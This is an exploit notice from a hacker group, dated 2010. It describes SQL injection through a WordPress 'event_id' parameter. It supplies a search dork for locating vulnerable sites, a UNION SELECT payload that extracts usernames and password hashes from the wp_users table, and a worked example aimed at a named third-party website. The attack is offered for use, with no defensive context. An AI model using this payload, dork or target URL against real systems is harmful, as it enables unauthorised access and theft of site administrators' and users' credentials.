WordPress (?event_id=) Sql Injection Vulnerability
==========================================================

###########################################
.:. Author         : HackXBack

.:. Email          : h-b@usa.com

.:. Team           : Sec Attack Team

.:. Home           : www.sec-attack.com/vb

.:. Script         : WordPress

.:. Script Download: http://wordpress.org/download/html

.:. Bug Type       : Sql Injection [Mysql]

.:. Dork           :"powered by WordPress" inurl:"/?event_id="

.:. Date           : 31/1/2010

#############################################

===[ Exploit ]===

www.site.com/?event_id=[Sql]

www.site.com/Path/?event_id=[Sql]

Exploit:

null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Example :

http://seattleplus10.org/calendar?event_id=-27 union select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

==========================================================
Greats T0 : Sec Attack Team & All Member In Sec Attack - Lebanese Hacker